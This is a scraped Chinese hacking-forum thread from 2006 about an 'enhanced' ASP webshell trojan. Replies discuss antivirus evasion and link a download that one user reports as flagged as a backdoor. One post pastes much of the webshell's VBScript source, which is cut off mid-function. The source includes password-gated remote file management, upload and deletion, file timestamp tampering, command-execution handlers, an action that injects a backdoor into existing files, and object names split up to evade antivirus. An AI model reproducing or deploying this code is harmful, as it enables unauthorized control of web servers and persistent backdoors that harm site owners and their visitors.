打印

[原创]海洋顶端ASP木马增强版

stealthwalker

技术核心组

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 529
精华: 82
积分: 6504
阅读权限: 200
在线时间: 393 小时
注册时间: 2004-12-6
最后登录: 2008-8-22

原创技术奖核心建议奖优秀管理奖软件研发奖

发短消息
加为好友
当前离线

26楼 大中小发表于 2006-9-24 12:33 只看该作者

提个建议：
首先感谢楼主的共享，十分欣赏你这种精神。但发原创的目的不仅仅是共享，共享是有益于他人，东西共享出来还有一个重要的目的就是有助于自己的提高。就拿楼主的这个东西来说吧，我个人感觉是不错的。楼主发出来让别人使用，这是益于他人，那么他人看完或着试用了楼主的DD后提出质疑或者修改意见，楼主在斟酌后觉得可行，就应该针对自己的作品进行适当的修正，然后把修正后的作品更新到您的帖子上继续让大家受益，当然在别人受益的同时相信楼主也会得到自己想得到的东西。

说这些，是因为我看到后面跟贴的朋友提出了一些问题，楼主的回复却是让他们自己动手修改。当然，有可能楼主的想法是好的，你帮他们修改了容易让他们养成那种拿来主义的习惯。不过我们应该从你发布作品这个角度来，一个有始有终的作品就是在不断的修改和更新的过程中得到锤炼的。所以我还是建议楼主，根据大家的反馈修改你的作品，然后更新到你的顶贴中。而且我也觉得你应该提供一份未加密的程序出来，这样有助于大家学习，也能避免一些不必要的误会。

说这些希望楼主能够考虑一下，最后再次谢谢你的共享。希望你以后能拿出更多更好的作品来大家一起交流。

俺是mika！别叫错了！俺的QQ：794773 http://hi.baidu.com/stealthwalker/ my private area ------------------------------------------------------------ <a href=http://hi.baidu.com/stealthwalker target=_blank></a>

TOP

无双坏坏

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T期刊部成员期刊副主编

帖子: 804
精华: 26
积分: 4886
阅读权限: 100
在线时间: 414 小时
注册时间: 2005-6-17
最后登录: 2008-11-15

发短消息
加为好友
当前离线

27楼 大中小发表于 2006-9-24 13:25 只看该作者

发代码的能不能先保存到附件里？一大段一大段眼都花了

大家要看的是研究过的东西，把自己研究的重点提出来不是很好么？没有必要把其他的都发出来吧，如果必要对自己的观点说明，可以发在附件里

http://iittss.com/ kijs与牛人在一起不是有理由的让自己变懒,那是为了让视野更开阔

TOP

xiaocool

晶莹剔透§烈日灼然

Rank: 1

帖子: 162
精华: 2
积分: 431
阅读权限: 40
在线时间: 76 小时
注册时间: 2005-8-4
最后登录: 2008-10-26

发短消息
加为好友
当前离线

28楼 大中小发表于 2006-9-24 15:23 只看该作者

问下怎么修改界面啊？我用DW导入什么都看不到。。

TOP

remax

晶莹剔透§烈日灼然

Rank: 1

帖子: 324
精华: 2
积分: 907
阅读权限: 50
在线时间: 79 小时
注册时间: 2005-10-25
最后登录: 2008-7-13

发短消息
加为好友
当前离线

29楼 大中小发表于 2006-9-24 18:12 只看该作者

脚本程序也可以用加客软件了？看来我还不是一般的没文化。。
[这些脚本程序免杀方法应该叫做加密更好一点吧，脚本我还是懂一点的，汇编就不行咯。。X烟X云跟俺说，汇编是要一点点高级语言基础的，不过我现在还是没达到他哪个一点点。。我不是xyzreg，本人不牛。。。]

20字节够写什么？

TOP

junoon

晶莹剔透§烈日灼然

Rank: 1

帖子: 12
精华: 0
积分: 32
阅读权限: 40
性别: 男
在线时间: 22 小时
注册时间: 2004-10-23
最后登录: 2008-4-16

发短消息
加为好友
当前离线

30楼 大中小发表于 2006-9-25 08:56 只看该作者

我有个.net的海洋。。。。不过我没法上传。。。。大家去我博客下算了。。。
http://www.myclub2.com/blog/Files/junoon/newup.rar
没有加密。大家放心

TOP

yxqadr

晶莹剔透§烈日灼然

Rank: 1

帖子: 44
精华: 0
积分: 181
阅读权限: 40
性别: 男
来自: 云南昆明
在线时间: 111 小时
注册时间: 2005-10-26
最后登录: 2008-10-15

发短消息
加为好友
当前离线

31楼 大中小发表于 2006-9-25 11:57 只看该作者

Kaspersky Anti-Virus 6.0 Beta
The requested URL http://www.myclub2.com/blog/Files/junoon/newup.rar is infected with Backdoor.ASP.Ace.ap virus

楼上的这个还是会被杀了的.下下来看看.谢谢分享

我是垃圾我学习!

TOP

verror

晶莹剔透§烈日灼然

Rank: 1

帖子: 7
精华: 0
积分: 24
阅读权限: 40
在线时间: 6 小时
注册时间: 2006-9-25
最后登录: 2008-7-17

发短消息
加为好友
当前离线

32楼 大中小发表于 2006-9-25 13:10 只看该作者

我来贴上源码(不会加附件)
<%@ LANGUAGE = 'VBScript' %>
<%

  Dim theAct, sTime, aspPath, zxzgcn, strBackDoor, fsoX, saX, wsX

  sTime = Timer
  theAct= Request("theAct")
  zxzgcn = Request("zxzgcn")
  aspPath = Server.MapPath(".")


  Const m = "zxzgcn"
  Const showLogin = "login"
  Const clientPassword = "#"
  Const dbSelectNumber = 10
  Const isDebugMode = False
  Const myName = "GET IN"
  Const notdownloadsExists = False
  Const userPassword = "ttfct"
  Const MyCmdDoTExeFiLe = "cOmmaNd.coM"
  ConSt strJSCloSeMe = "<inPut tYpe=butTon vAluE=' 关闭 ' onClick='wiNdow.cloSe();'>"

  Sub creAteIT(fSoX, SaX, wSX)
If isDebugMode = False Then
   On Error Resume Next
End If

Set fsoX = Server.CreateObject("Scripting.FileSy"&x&"stemObject")
If IsEmpty(fsoX) And (zxzgcn = "FsoFile"&x&"Explorer" Or theAct = "fsoSe"&x&"arch") Then
   Set fsoX = fso
End If

Set saX = Server.CreateObject("Shell.Ap"&x&"plication")
If IsEmpty(saX) And (zxzgcn = "AppFileExplorer" Or zxzgcn = "Sa"&x&"CmdRun" Or theAct = "saSe"&x&"arch") Then
   Set saX = sa
End If

Set wsX = Server.CreateObject("WScrip"&x&"t.Shell")
If IsEmpty(wsX) And (zxzgcn = "WsCm"&x&"dRun" Or theAct = "getTermina"&x&"lInfo" Or theAct = "readR"&x&"eg") Then
   Set wsX = ws
End If

If Err Then
   Err.Clear
End If
  End Sub

  Sub chkErr(Err)
If Err Then
   echo "<style>body{margin:8;border:none;overflow:hidden;background-color:buttonface;}</style>"
   echo "<br/><font size=2><li>错误: " & Err.Description & "</li><li>错误源: " & Err.Source & "</li><br/>"
   echo "<hr></font>"
   Err.Clear
   Response.End
End If
  End Sub

  Sub echo(str)
Response.Write(str)
  End Sub

  Sub isIn()
If zxzgcn <> "" And zxzgcn <> "login" And zxzgcn <> showLogin Then
   If Session(m & "userPassword") <> userPassword Then
      Response.End
   End If
End If
  End Sub

  Sub showTitle(str)
echo "<title>" & str & " </title>" & vbNewLine
echo "<meta http-equiv='Content-Type' content='text/html; charset=gb2312'>" & vbNewLine
echo "" & vbNewLine
PageOther()
  End Sub

  Function fixNull(str)
If IsNull(str) Then
   str = " "
End If
fixNull = str
  End Function

  Function encode(str)
str = Server.HTMLEncode(str)
str = Replace(str, vbNewLine, "<br>")
str = Replace(str, " ", " ")
str = Replace(str, "  ", " ")
encode = str
  End Function

  Function getTheSize(theSize)
If theSize >= (1024 * 1024 * 1024) Then getTheSize = Fix((theSize / (1024 * 1024 * 1024)) * 100) / 100 & "G"
If theSize >= (1024 * 1024) And theSize < (1024 * 1024 * 1024) Then getTheSize = Fix((theSize / (1024 * 1024)) * 100) / 100 & "M"
If theSize >= 1024 And theSize < (1024 * 1024) Then getTheSize = Fix((theSize / 1024) * 100) / 100 & "K"
If theSize >= 0 And theSize <1024 Then getTheSize = theSize & "B"
  End Function

  Function HtmlEncode(str)
If isNull(str) Then
   Exit Function
End If
HtmlEncode = Server.HTMLEncode(str)
  End Function

  Function UrlEncode(str)
If isNull(str) Then
   Exit Function
End If
UrlEncode = Server.UrlEncode(str)
  End Function

  Sub redirectTo(strUrl)
Response.Redirect(Request.ServerVariables("URL") & strUrl)
  End Sub

  Function trimThePath(strPath)
If Right(strPath, 1) = "\" And Len(strPath) > 3 Then
   strPath = Left(strPath, Len(strPath) - 1)
End If
trimThePath = strPath
  End Function

  Sub alertThenClose(strInfo)
Response.Write "<script>alert(""" & strInfo & """);window.close();</script>"
  End Sub

  Sub showErr(str)
Dim i, arrayStr
str = Server.HtmlEncode(str)
arrayStr = Split(str, "$$")
' Response.Clear
echo "<font size=2>"
echo "出错信息:<br/><br/>"
For i = 0 To UBound(arrayStr)
   echo "  " & (i + 1) & ". " & arrayStr(i) & "<br/>"
Next
echo "</font>"
Response.End
  End Sub

  isIn()

  Call createIt(fsoX, saX, wsX)

  Select Case zxzgcn
Case showLogin, "login"
   PageLogin()
Case "PageList"
   PageList()
Case "objOnSrv"
   PageObjOnSrv()
Case "ServiceList"
   PageServiceList()
Case "userList"
   PageUserList()
Case "CSInfo"
   PageCSInfo()
Case "infoAboutSrv"
   PageInfoAboutSrv()
Case "AppFileExplorer"
   PageAppFileExplorer()
Case "SaCmdRun"
   PageSaCmdRun()
Case "WsCmdRun"
   PageWsCmdRun()
Case "FsoFileExplorer"
   PageFsoFileExplorer()
Case "MsDataBase"
   PageMsDataBase()
Case "OtherTools"
   PageOtherTools()
Case "TxtSearcher"
   PageTxtSearcher()
Case "PageAddToMdb"
   PageAddToMdb()
Case "mycom"
   mycom()
  End Select

  Set saX = Nothing
  Set wsX = Nothing
  Set fsoX = Nothing

  Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Rem 下面是各独立功能模块
  Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  Sub PageAppFileExplorer()
Response.Buffer = True
If isDebugMode = False Then
   On Error Resume Next
End If
Dim strExtName, thePath, objFolder, objMember, strDetails, strPath, strNewName
Dim intI, theAct, strTmp, strFolderList, strFileList, strFilePath, strFileName, strParentPath

showTitle("She"&T&"ll.Appl"&T&"ication文件浏览器(&stream)")

theAct = Request("theAct")
strNewName = Request("newName")
thePath = Replace(LTrim(Request("thePath")), "\\", "\")

If theAct <> "upload" Then
   If Request.Form.Count > 0 Then
      theAct = Request.Form("theAct")
      thePath = Replace(LTrim(Request.Form("thePath")), "\\", "\")
   End If
End If

echo "<style>body{margin:8;}</style>"

Select Case theAct
   Case "openUrl"
      openUrl(thePath)
   Case "showEdit"
      Call showEdit(thePath, "stream")
   Case "saveFile"
      Call saveToFile(thePath, "stream")
   Case "copyOne", "cutOne"
      If thePath = "" Then
      alertThenClose("参数错误!")
      Response.End
      End If
      Session(m & "appThePath") = thePath
      Session(m & "appTheAct") = theAct
      alertThenClose("操作成功,请粘贴!")
   Case "pastOne"
      appDoPastOne(thePath)
      alertThenClose("粘贴成功,请刷新本页查看效果!")
   Case "rename"
      appRenameOne(thePath)
   Case "downTheFile"
      downTheFile(thePath)
   Case "theAttributes"
      appTheAttributes(thePath)
   Case "showUpload"
      Call showUpload(thePath, "AppFileExplorer")
   Case "upload"
      streamUpload(thePath)
      Call showUpload(thePath, "AppFileExplorer")
   Case "inject"
      strTmp = streamLoadFromFile(thePath)
      fsoSaveToFile thePath, strTmp & strBackDoor
      alertThenClose("插入成功!")
End Select

If theAct <> "" Then
   Response.End
End If

Set objFolder = saX.NameSpace(thePath)

If Request.Form.Count > 0 Then
   redirectTo("?zxzgcn=AppFileExplorer&thePath=" & UrlEncode(thePath))
End If
echo "<input type=hidden name=usePath /><input type=hidden value=AppFileExplorer name=zxzgcn />"
echo "<input type=hidden value=""" & HtmlEncode(thePath) & """ name=truePath />"
echo "<div style='left:0px;width:100%;height:48px;position:absolute;top:2px;' id=fileExplorerTools>"
echo "<input type=button value=' 打开 ' onclick='openUrl();'>"
echo "<input type=button value=' 编辑 ' onclick='editFile();'>"
echo "<input type=button value=' 复制 ' onclick=appDoAction('copyOne');>"
echo "<input type=button value=' 剪切 ' onclick=appDoAction('cutOne');>"
echo "<input type=button value=' 粘贴 ' onclick=appDoAction2('pastOne');>"
echo "<input type=button value=' 上传 ' onclick='upTheFile();'>"
echo "<input type=button value=' 下载 ' onclick='downTheFile();'>"
echo "<input type=button value=' 属性 ' onclick='appTheAttributes();'>"
echo "<input type=button value=' 插入 ' onclick=appDoAction('inject');>"
echo "<input type=button value='重命名' onclick='appRename();'>"
echo "<input type=button value='我的电脑' onclick=location.href='?zxzgcn=AppFileExplorer&thePath='>"
echo "<input type=button value='控制面板' onclick=location.href='?zxzgcn=AppFileExplorer&thePath=::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\::{21EC2020-3AEA-1069-A2DD-08002B30309D}'>"
echo "<form method=post action='?zxzgcn=AppFileExplorer'>"
echo "<input type=button value=' 后退 ' onclick='this.disabled=true;history.back();' />"
echo "<input type=button value=' 前进 ' onclick='this.disabled=true;history.go(1);' />"
echo "<input type=button value=站点根 onclick=location.href=""?zxzgcn=AppFileExplorer&thePath=" & URLEncode(Server.MapPath("\")) & """;>"
echo "<input style='width:60%;' name=thePath value=""" & HtmlEncode(thePath) & """ />"
echo "<input type=submit value=' GO.' /><input type=button value=' 刷新 ' onclick='location.reload();'></form><hr/>"
echo "</div><div style='height:50px;'></div>"
echo "<script>fixTheLayer('fileExplorerTools');setInterval(""fixTheLayer('fileExplorerTools');"", 200);</script>"

For Each objMember In objFolder.Items
   intI = intI + 1
   If intI > 200 Then
      intI = 0
      Response.Flush()
   End If

   If objMember.IsFolder = True Then
      If Left(objMember.Path, 2) = "::" Then
      strPath = URLEncode(objMember.Path)
      Else
      strPath = URLEncode(objMember.Path) & "%5C"
      End If
      strFolderList = strFolderList & "<span id=""" & strPath & """ ondblclick='changeThePath(this);' onclick='changeMyClass(this);'><font class=font face=Wingdings>0</font><br/>" & objMember.Name & "</span>"
   Else
      strDetails = objFolder.GetDetailsOf(objMember, -1)
      strFilePath = objMember.Path
      strFileName = Mid(strFilePath, InStrRev(strFilePath, "\") + 1)
      strExtName = Split(strFileName, ".")(UBound(Split(strFileName, ".")))
      strFileList = strFileList & "<span title=""" & strDetails & """ ondblclick='openUrl();' id=""" & URLEncode(strFilePath) & """ onclick='changeMyClass(this);'><font class=font face=" & getFileIcon(strExtName) & "</font><br/>" & strFileName & "</span>"
   End If
Next
chkErr(Err)

strParentPath = getParentPath(thePath)
If thePath <> "" And Left(thePath, 2) <> "::" Then
   strFolderList = "<span id=""" & URLEncode(strParentPath) & """ ondblclick='changeThePath(this);' onclick='changeMyClass(this);'><font class=font face=Wingdings>0</font><br/>..</span>" & strFolderList
End If

echo "<div id=FileList>"
echo strFolderList & strFileList
echo "</div>"
echo "<hr/>"

Set objFolder = Nothing
  End Sub

  Function getParentPath(strPath)
If Right(strPath, 1) = "\" Then
   strPath = Left(strPath, Len(strPath) - 1)
End If
If Len(strPath) = 2 Then
   getParentPath = " "
   Else
   getParentPath = Left(strPath, InStrRev(strPath, "\"))
End If
  End Function

  Function streamSaveToFile(thePath, fileContent)
Dim stream
If isDebugMode = False Then
   On Error Resume Next
End If
Set stream = Server.CreateObject("ad"&e&"odb.st"&e&"ream")
With stream
   .Type=2
   .Mode=3
   .Open
   chkErr(Err)
   .Charset="gb2312"
   .WriteText fileContent
   .saveToFile thePath, 2
   .Close
End With
Set stream = Nothing
  End Function

  Sub appDoPastOne(thePath)
If isDebugMode = False Then
   On Error Resume Next
End If
Dim strAct, strPath
dim objTargetFolder
strAct = Session(m & "appTheAct")
strPath = Session(m & "appThePath")

If strAct = "" Or strPath = "" Then
   alertThenClose("参数错误,粘贴前请先复制/剪切!")
   Exit Sub
End If

If InStr(LCase(thePath), LCase(strPath)) > 0 Then
   alertThenClose("目标文件夹在源文件夹内,非法操作!")
   Exit Sub
End If

strPath = trimThePath(strPath)
thePath = trimThePath(thePath)

Set objTargetFolder = saX.NameSpace(thePath)
If strAct = "copyOne" Then
   objTargetFolder.CopyHere(strPath)
   Else
   objTargetFolder.MoveHere(strPath)
End If
chkErr(Err)

Set objTargetFolder = Nothing
  End Sub

  Sub appTheAttributes(thePath)
If isDebugMode = False Then
   On Error Resume Next
End If
Dim i, strSth, objFolder, objItem, strModifyDate
strModifyDate = Request("ModifyDate")

thePath = trimThePath(thePath)

If thePath = "" Then
   alertThenClose("没有选择任何文件(夹)!")
   Exit Sub
End If

strSth = Left(thePath, InStrRev(thePath, "\"))
Set objFolder = saX.NameSpace(strSth)
chkErr(Err)
strSth = Split(thePath, "\")(UBound(Split(thePath, "\")))
Set objItem = objFolder.ParseName(strSth)
chkErr(Err)

If isDate(strModifyDate) Then
   objItem.ModifyDate = strModifyDate
   alertThenClose("修改成功!")
   Set objItem = Nothing
   Set objFolder = Nothing
   Exit Sub
End If

' strSth = objFolder.GetDetailsOf(objItem, -1)
' strSth = Replace(strSth, chr(10), "<br/>")
For i = 1 To 8
   strSth = strSth & "<br/>属性(" & i & "): " & objFolder.GetDetailsOf(objItem, i)
Next
strSth = Replace(strSth, "属性(1)", "大小")
strSth = Replace(strSth, "属性(2)", "类型")
strSth = Replace(strSth, "属性(3)", "最后修改")
strSth = Replace(strSth, "属性(8)", "所有者")
strSth = strSth & "<form method=post>"
strSth = strSth & "<input type=hidden name=theAct value=theAttributes>"
strSth = strSth & "<input type=hidden name=thePath value=""" & thePath & """>"
strSth = strSth & "<br/>最后修改: <input size=30 value='" & objFolder.GetDetailsOf(objItem, 3) & "' name=ModifyDate />"
strSth = strSth & "<input type=submit value=' 修改 '>"
strSth = strSth & "</form>"
echo strSth

Set objItem = Nothing
Set objFolder = Nothing
  End Sub

  Sub appRenameOne(thePath)
If isDebugMode = False Then
   On Error Resume Next
End If
Dim strSth, fileName, objItem, objFolder
fileName = Request("fileName")

thePath = trimThePath(thePath)

strSth = Left(thePath, InStrRev(thePath, "\"))
Set objFolder = saX.NameSpace(strSth)
chkErr(Err)
strSth = Split(thePath, "\")(UBound(Split(thePath, "\")))
Set objItem = objFolder.ParseName(strSth)
chkErr(Err)
strSth = Split(thePath, ".")(UBound(Split(thePath, ".")))

If fileName <> "" Then
   objItem.Name = fileName
   chkErr(Err)
   alertThenClose("重命名成功,刷新本页可以看到效果!")
   Set objItem = Nothing
   Set objFolder = Nothing
   Exit Sub
End If

echo "<form method=post>重命名:"
echo "<input type=hidden name=theAct value=rename>"
echo "<input type=hidden name=thePath value=""" & thePath & """>"
echo "<br/><input size=30 value=""" & objItem.Name & """ name=fileName />"
If InStr(strSth, ":") <= 0 Then
   echo "." & strSth
End If
echo "<hr/><input type=submit value=' 修改 '>" & strJsCloseMe
echo "</form>"

Set objItem = Nothing
Set objFolder = Nothing
  End Sub

  Sub PageCSInfo()
If isDebugMode = False Then
   On Error Resume Next
End If
Dim strKey, strVar, strVariable

showTitle("客户端服务器交互信息")

echo "<a href=javascript:showHideMe(ServerVariables);>ServerVariables:</a>"
echo "<span id=ServerVariables style='display:none;'>"
For Each strVariable In Request.ServerVariables
   echo "<li>" & strVariable & ": " & Request.ServerVariables(strVariable) & "</li>"
Next
echo "</span>"

echo "<br/><a href=javascript:showHideMe(Application);>Application:</a>"
echo "<span id=Application style='display:none;'>"
For Each strVariable In Application.Contents
   echo "<li>" & strVariable & ": " & Encode(Application(strVariable)) & "</li>"
   If Err Then
      For Each strVar In Application.Contents(strVariable)
      echo "<li>" & strVariable & "(" & strVar & "): " & Encode(Application(strVariable)(strVar)) & "</li>"
      Next
      Err.Clear
   End If
Next
echo "</span>"

echo "<br/><a href=javascript:showHideMe(Session);>Session:(ID" & Session.SessionId & ")</a>"
echo "<span id=Session style='display:none;'>"
For Each strVariable In Session.Contents
   echo "<li>" & strVariable & ": " & Encode(Session(strVariable)) & "</li>"
Next
echo "</span>"

echo "<br/><a href=javascript:showHideMe(Cookies);>Cookies:</a>"
echo "<span id=Cookies style='display:none;'>"
For Each strVariable In Request.Cookies
   If Request.Cookies(strVariable).HasKeys Then
      For Each strKey In Request.Cookies(strVariable)
      echo "<li>" & strVariable & "(" & strKey & "): " & HtmlEncode(Request.Cookies(strVariable)(strKey)) & "</li>"
      Next
   Else
      echo "<li>" & strVariable & ": " & Encode(Request.Cookies(strVariable)) & "</li>"
   End If
Next
echo "</span><hr/>"

  End Sub

  Sub PageFsoFileExplorer()
If isDebugMode = False Then
   On Error Resume Next
End If
Response.Buffer = True
Dim file, drive, folder, theFiles, theFolder, theFolders
Dim i, theAct, strTmp, driveStr, thePath, parentFolderName

theAct = Request("theAct")
thePath = Request("thePath")
If theAct <> "upload" Then
   If Request.Form.Count > 0 Then
      theAct = Request.Form("theAct")
      thePath = Request.Form("thePath")
   End If
End If

showTitle("FSO文件浏览器(&stream)")

Select Case theAct
   Case "newOne", "doNewOne"
      fsoNewOne(thePath)
   Case "showEdit"
      Call showEdit(thePath, "fso")
   Case "saveFile"
      Call saveToFile(thePath, "fso")
   Case "openUrl"
      openUrl(thePath)
   Case "copyOne", "cutOne"
      If thePath = "" Then
      alertThenClose("参数错误!")
      Response.End
      End If
      Session(m & "fsoThePath") = thePath
      Session(m & "fsoTheAct") = theAct
      alertThenClose("操作成功,请粘贴!")
   Case "pastOne"
      fsoPastOne(thePath)
      alertThenClose("粘贴成功,请刷新本页查看效果!")
   Case "showFsoRename"
      showFsoRename(thePath)
   Case "doRename"
      Call fsoRename(thePath)
      alertThenClose("重命名成功,刷新后可以看到效果!")
   Case "delOne", "doDelOne"
      showFsoDelOne(thePath)
   Case "getAttributes", "doModifyAttributes"
      fsoTheAttributes(thePath)
   Case "downTheFile"
      downTheFile(thePath)
   Case "showUpload"
      Call showUpload(thePath, "FsoFileExplorer")
   Case "upload"
      streamUpload(thePath)
      Call showUpload(thePath, "FsoFileExplorer")
   Case "inject"
      Set theFiles = fsoX.OpenTextFile(thePath)
      strTmp = theFiles.ReadAll()
      fsoSaveToFile thePath, strTmp & strBackDoor
      Set theFiles = Nothing
      alertThenClose("插入成功!")
End Select

If theAct <> "" Then
   Response.End
End If

If Request.Form.Count > 0 Then
   redirectTo("?zxzgcn=FsoFileExplorer&thePath=" & UrlEncode(thePath))
End If

parentFolderName = fsoX.GetParentFolderName(thePath)

echo "<div style='left:0px;width:100%;height:48px;position:absolute;top:2px;' id=fileExplorerTools>"
echo "<input type=button value=' 新建 ' onclick=newOne();>"
echo "<input type=button value=' 更名 ' onclick=fsoRename();>"
echo "<input type=button value=' 编辑 ' onclick=editFile();>"
echo "<input type=button value=' 打开 ' onclick=openUrl();>"
echo "<input type=button value=' 复制 ' onclick=appDoAction('copyOne');>"
echo "<input type=button value=' 剪切 ' onclick=appDoAction('cutOne');>"
echo "<input type=button value=' 粘贴 ' onclick=appDoAction2('pastOne')>"
echo "<input type=button value=' 属性 ' onclick=fsoGetAttributes();>"
echo "<input type=button value=' 插入 ' onclick=appDoAction('inject');>"
echo "<input type=button value=' 删除 ' onclick=delOne();>"
echo "<input type=button value=' 上传 ' onclick='upTheFile();'>"
echo "<input type=button value=' 下载 ' onclick='downTheFile();'>"
echo "<br/>"
echo "<input type=hidden value=FsoFileExplorer name=zxzgcn />"
echo "<input type=hidden value=""" & UrlEncode(thePath) & """ name=truePath>"
echo "<input type=hidden size=50 name=usePath>"

echo "<form method=post action=?zxzgcn=FsoFileExplorer>"
If parentFolderName <> "" Then
   echo "<input value='↑向上' type=button onclick=""this.disabled=true;location.href='?zxzgcn=FsoFileExplorer&thePath=" & Server.UrlEncode(parentFolderName) & "';"">"
End If
echo "<input type=button value=' 后退 ' onclick='this.disabled=true;history.back();' />"
echo "<input type=button value=' 前进 ' onclick='this.disabled=true;history.go(1);' />"
echo "<input size=60 value=""" & HtmlEncode(thePath) & """ name=thePath>"
echo "<input type=submit value=' 转到 '>"
driveStr = "<option>盘符</option>"
driveStr = driveStr & "<option value='" & HtmlEncode(Server.MapPath(".")) & "'>.</option>"
driveStr = driveStr & "<option value='" & HtmlEncode(Server.MapPath("/")) & "'>/</option>"
For Each drive In fsoX.Drives
   driveStr = driveStr & "<option value='" & drive.DriveLetter & ":\'>" & drive.DriveLetter & ":\</option>"
Next
echo "<input type=button value=' 刷新 ' onclick='location.reload();'> "
echo "<select onchange=""this.form.thePath.value=this.value;this.form.submit();"">" & driveStr & "</select>"
echo "<hr/></form>"
echo "</div><div style='height:50px;'></div>"
echo "<script>fixTheLayer('fileExplorerTools');setInterval(""fixTheLayer('fileExplorerTools');"", 200);</script>"

If fsoX.FolderExists(thePath) = False Then
   showErr(thePath & " 目录不存在或者不允许访问!")
End If
Set theFolder = fsoX.GetFolder(thePath)
Set theFiles = theFolder.Files
Set theFolders = theFolder.SubFolders

echo "<div id=FileList>"
For Each folder In theFolders
   i = i + 1
   If i > 50 Then
      i = 0
      Response.Flush()
   End If
   strTmp = UrlEncode(folder.Path & "\")
   echo "<span id='" & strTmp & "' onDblClick=""changeThePath(this);"" onclick=changeMyClass(this);><font class=font face=Wingdings>0</font><br/>" & folder.Name & "</span>" & vbNewLine
Next
Response.Flush()
For Each file In theFiles
   i = i + 1
   If i > 100 Then
      i = 0
      Response.Flush()
   End If
   echo "<span id='" & UrlEncode(file.Path) & "' title='类型: " & file.Type & vbNewLine & "大小: " & getTheSize(file.Size) & "' onDblClick=""openUrl();"" onclick=changeMyClass(this);><font class=font face=" & getFileIcon(fsoX.GetExtensionName(file.Name)) & "</font><br/>" & file.Name & "</span>" & vbNewLine
Next
echo "</div>"
chkErr(Err)

echo "<hr/>"
  End Sub

  Sub fsoNewOne(thePath)
If isDebugMode = False Then
   On Error Resume Next
End If
Dim theAct, isFile, theName, newAct
isFile = Request("isFile")
newAct = Request("newAct")
theName = Request("theName")

If newAct = " 确定 " Then
   thePath = Replace(thePath & "\" & theName, "\\", "\")
   If isFile = "True" Then
      Call fsoX.CreateTextFile(thePath, False)
   Else
      fsoX.CreateFolder(thePath)
   End If
   chkErr(Err)
   alertThenClose("文件(夹)新建成功,刷新后就可以看到效果!")
   Response.End
End If

echo "<style>body{overflow:hidden;}</style>"
echo "<body topmargin=2>"
echo "<form method=post>"
echo "<input type=hidden name=thePath value=""" & HtmlEncode(thePath) & """><br/>新建: "
echo "<input type=radio name=isFile id=file value='True' checked><label for=file>文件</label> "
echo "<input type=radio name=isFile id=folder value='False'><label for=folder>文件夹</label><br/>"
echo "<input size=38 name=theName><hr/>"
echo "<input type=hidden name=theAct value=doNewOne>"
echo "<input type=submit name=newAct value=' 确定 '>" & strJsCloseMe
echo "</form>"
echo "</body><br/>"
  End Sub

  Sub fsoPastOne(thePath)
If isDebugMode = False Then
   On Error Resume Next
End If
Dim sessionPath
sessionPath = Session(m & "fsoThePath")

If thePath = "" Or sessionPath = "" Then
   alertThenClose("参数错误!")
   Response.End
End If

If Right(thePath, 1) = "\" Then
   thePath = Left(thePath, Len(thePath) - 1)
End If

If Right(sessionPath, 1) = "\" Then
   sessionPath = Left(sessionPath, Len(sessionPath) - 1)
   If Session(m & "fsoTheAct") = "cutOne" Then
      Call fsoX.MoveFolder(sessionPath, thePath & "\" & fsoX.GetFileName(sessionPath))
   Else
      Call fsoX.CopyFolder(sessionPath, thePath & "\" & fsoX.GetFileName(sessionPath))
   End If
   Else
   If Session(m & "fsoTheAct") = "cutOne" Then
      Call fsoX.MoveFile(sessionPath, thePath & "\" & fsoX.GetFileName(sessionPath))
   Else
      Call fsoX.CopyFile(sessionPath, thePath & "\" & fsoX.GetFileName(sessionPath))
   End If
End If

chkErr(Err)
  End Sub

  Sub fsoRename(thePath)
If isDebugMode = False Then
   On Error Resume Next
End If
Dim theFile, fileName, theFolder
fileName = Request("fileName")

If thePath = "" Or fileName = "" Then
   alertThenClose("参数错误!")
   Response.End
End If

If Right(thePath, 1) = "\" Then
   Set theFolder = fsoX.GetFolder(thePath)
   theFolder.Name = fileName
   Set theFolder = Nothing
   Else
   Set theFile = fsoX.GetFile(thePath)
   theFile.Name = fileName
   Set theFile = Nothing
End If

chkErr(Err)
  End Sub

  Sub showFsoRename(thePath)
Dim theAct, fileName
fileName = fsoX.getFileName(thePath)

echo "<style>body{overflow:hidden;}</style>"
echo "<body topmargin=2>"
echo "<form method=post>"
echo "<input type=hidden name=thePath value=""" & HtmlEncode(thePath) & """><br/>更名为:<br/>"
echo "<input size=38 name=fileName value=""" & HtmlEncode(fileName) & """><hr/>"
echo "<input type=submit value=' 确定 '>"
echo "<input type=hidden name=theAct value=doRename>"
echo "<input type=button value=' 关闭 ' onclick='window.close();'>"
echo "</form>"
echo "</body><br/>"
  End Sub

  Sub showFsoDelOne(thePath)
If isDebugMode = False Then
   On Error Resume Next
End If
Dim newAct, theFile
newAct = Request("newAct")

If newAct = "确认删除?" Then
   If Right(thePath, 1) = "\" Then
      thePath = Left(thePath, Len(thePath) - 1)
      Call fsoX.DeleteFolder(thePath, True)
   Else
      Call fsoX.DeleteFile(thePath, True)
   End If
   chkErr(Err)
   alertThenClose("文件(夹)删除成功,刷新后就可以看到效果!")
   Response.End
End If

echo "<style>body{margin:8;border:none;overflow:hidden;background-color:buttonface;}</style>"
echo "<form method=post><br/>"
echo HtmlEncode(thePath)
echo "<input type=hidden name=thePath value=""" & HtmlEncode(thePath) & """>"
echo "<input type=hidden name=theAct value=doDelOne>"
echo "<hr/><input type=submit name=newAct value='确认删除?'><input type=button value=' 关闭 ' onclick='window.close();'>"
echo "</form>"
  End Sub

  Sub fsoTheAttributes(thePath)
If isDebugMode = False Then
   On Error Resume Next
End If
Dim newAct, theFile, theFolder, theTitle
newAct = Request("newAct")

If Right(thePath, 1) = "\" Then
   Set theFolder = fsoX.GetFolder(thePath)
   If newAct = " 修改 " Then
      setMyTitle(theFolder)
   End If
      theTitle = getMyTitle(theFolder)
   Set theFolder = Nothing
   Else
   Set theFile = fsoX.GetFile(thePath)
   If newAct = " 修改 " Then
      setMyTitle(theFile)
   End If
   theTitle = getMyTitle(theFile)
   Set theFile = Nothing
End If

chkErr(Err)
theTitle = Replace(theTitle, vbNewLine, "<br/>")
echo "<style>body{margin:8;overflow:hidden;}</style>"
echo "<form method=post>"
echo "<input type=hidden name=thePath value=""" & HtmlEncode(thePath) & """>"
echo "<input type=hidden name=theAct value=doModifyAttributes>"
echo theTitle
